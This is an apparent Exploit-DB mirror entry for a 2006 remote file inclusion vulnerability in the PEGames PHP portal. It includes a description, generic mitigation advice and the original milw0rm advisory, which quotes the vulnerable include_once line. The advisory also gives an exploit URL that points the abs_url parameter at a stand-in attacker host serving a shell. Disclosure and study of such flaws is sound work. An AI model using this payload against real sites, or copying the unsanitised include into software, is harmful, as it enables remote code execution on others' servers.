header-logo
Suggest Exploit
vendor:
PEGames
by:
DeltahackingTEAM
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PEGames
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PEGames Remote File Inclusion Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the abs_url parameter. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent malicious input from being passed to the application. Additionally, the application should be configured to use a secure account with limited privileges.
Source

Exploit-DB raw data:

**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name : PEGames

* Class = Remote File Inclusion ;
 
* Download =http://ovh.dl.sourceforge.net/sourceforge/gamespe/PEGames.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Dr.Pantagon )

* With the special  thanks of my financial sponser Tanha
----------------------------------------------------------------------------------------------------------
- Vulnerable Code

include_once("$abs_url/display.php");
++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

    http://[target]/[path]/Index.php?abs_url=http://evilsite.com/shell?

***********************
I LOVE YOU G.Malake
***********************
----------------------------------------------------------------------------------------------------------
Greetz:Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc

# milw0rm.com [2006-11-23]